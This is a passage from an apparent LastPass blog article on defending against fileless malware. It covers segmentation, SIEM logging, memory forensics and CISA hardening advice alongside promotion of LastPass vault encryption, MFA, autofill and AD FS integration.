  • Network segmentation & SIEM traffic analysis: Proper segmentation limits lateral movement by threat actors. Forwarding logs to a SIEM as they are generated also keeps a copy off the host, so an attacker who clears or tampers with local event logs does not erase the record. As mentioned at the beginning of this article, threat actors have even used event logs as a hiding place for payloads. 
  • Memory forensics: Tools such as Volatility analyze captured RAM and find what file-based forensics cannot, which matters for LOTL attacks that leave few traces on disk. Volatility’s malfind plugin, for example, flags executable memory regions that are not backed by a file on disk, the hallmark of reflective DLL injection. 

How LastPass Protects Against Fileless Malware 

Integration of security features to combat fileless attacks 

As the world transforms around us, LastPass is ready with cutting-edge security features that help you fight back against fileless malware attacks. Here’s what we offer: 

  • AES-256 encryption with PBKDF2-SHA256 key derivation. Your master password is salted and run through PBKDF2-SHA256 to derive the key that encrypts your vault with AES-256, so the stored vault is unreadable without the master password. This protects the vault at rest and in transit; once you unlock it, decrypted entries exist in the client’s memory, which is exactly what memory-resident malware targets, so the endpoint controls described above still matter. 
  • Phishing-resistant MFA limits the damage when fileless malware or a phishing page diverts you to a lookalike website and captures your password: the password alone is not enough to sign in. 
  • Enjoy push-button convenience with LastPass Autofill, which populates forms without opening your vault or typing credentials keystroke by keystroke. This reduces exposure to keyloggers, a popular technique among fileless malware operators. 

Securing privileged access and preventing data breaches 

You may have heard strong passwords are your secret weapon against malware attacks. 

However, coming up with secure passwords after you’ve ploughed through the NIST four-volume tome on digital identity is about as exciting as reading the terms and conditions before a purchase – it's important but you’d rather be doing something else. 

At LastPass, our game-changing Password Generator removes the stress of generating strong passwords by doing it for you.  

LastPass also integrates with identity providers such as AD FS (Active Directory Federation Services) to govern access to sensitive business assets. By ensuring only authorized users can reach privileged resources, the chance of fileless malware moving laterally to a high-value target is reduced. 

Our integration with AD FS also supports MFA and federated single-sign-on (SSO). So, you only need one set of credentials to securely access resources across organizations and domains. 

Mitigating the risks of fileless malware 

CISA recommends several key hardening practices for mitigating the risks of fileless malware. Among them are: 

  • Applying industry or government standards for strengthening software and system configurations 
  • Regularly patching and updating operating systems and apps, especially for Windows, macOS, and Linux environments 
  • Applying minimum viable secure configuration baselines for Microsoft 365 and Google Workspace cloud environments 
  • Securing critical assets by applying vendor-specific hardening measures, especially for AD FS and AD CS 
  • Applying write-once, read-many storage for logs to prevent tampering with event logs 
  • Enabling phishing-resistant MFA and a robust PAM solution to ensure privileged access is granted only when required and for a limited duration 

Waiting to implement the strategies described above costs more than acting on them now. 

Start protecting your intellectual property and trade assets today by signing up for a free LastPass Business trial.